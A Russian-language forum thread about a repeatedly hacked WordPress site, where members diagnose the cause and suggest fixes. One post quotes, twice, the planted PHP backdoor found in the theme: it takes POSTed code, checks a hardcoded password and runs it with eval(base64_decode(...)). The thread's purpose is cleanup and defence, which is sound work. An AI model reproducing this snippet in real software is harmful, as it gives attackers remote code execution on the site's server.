WordPress, постоянный взлом сайта

Айболитом пробовали прогнать?

Возможно где-то шелл залит

В онлайн версии проверил. https://rescan.pro/result.php?5ed32649588fc6c1b5cfecddeddade5c

Кроме скрипта с другого сайта ничего не найдено.

Ну этот скрипт дырка и есть

Вот часть его - если передается команда и правильный пароль, то команда выполняется у вас на сервере

if (isset($_POST) && is_array($_POST) && count($_POST)>1) {
	foreach ($_POST as $var) {
		if (!isset($code)) $code = $var; elseif (!isset($pass)) $pass = $var; else break;
	}

	if ($pass == "wciPoGBxQ015QPQXN0oFEq03UkjEy3EZ") {
		eval(base64_decode($code));
	}
}

if (isset($_POST) && is_array($_POST) && count($_POST)>1) {

	foreach ($_POST as $var) {

		if (!isset($code)) $code = $var; elseif (!isset($pass)) $pass = $var; else break;

	}



	if ($pass == "wciPoGBxQ015QPQXN0oFEq03UkjEy3EZ") {

		eval(base64_decode($code));

	}

}

Вау... Что делать с этим? Удалить скрипт из шаблонов?

DezGot, ну да

Но не факт, что он единственный :)

Все почистил. Подождем, посмотрим :)

У Вас залит шел на сайте, который и делает на нем все что угодно.

Попробуйте проверить ай-болитом, как писали выше.

Если не получится, пишите в ЛС.

Постараюсь подсказать более подробно.

Рескан видит только то, что выводится в браузере - всяких троянов и редиректы. Шелл он обнаружить не сможет. Надо проверять файловую систему.

---------- Добавлено 07.11.2016 в 21:23 ----------

Обновить вордпресс до последней. Проверить тему - а лучше скачать новую на надежном портале шаблонов. Во всех премиум взломанных шаблонов спрятан вирус.

Но вместе с тем хватает идиотов, чтобы ставить своим клиентам ворованные темы с помоек.

И уж если такое

/*
Theme Name: Angar
Theme URI:
Author:
Author URI:
Description:
License:
License URI:
Tags:
Text Domain: angar
*/

фирилансел решил сделать, то... всяко может быть.

Svictor, прочти наконец правила форума/раздела.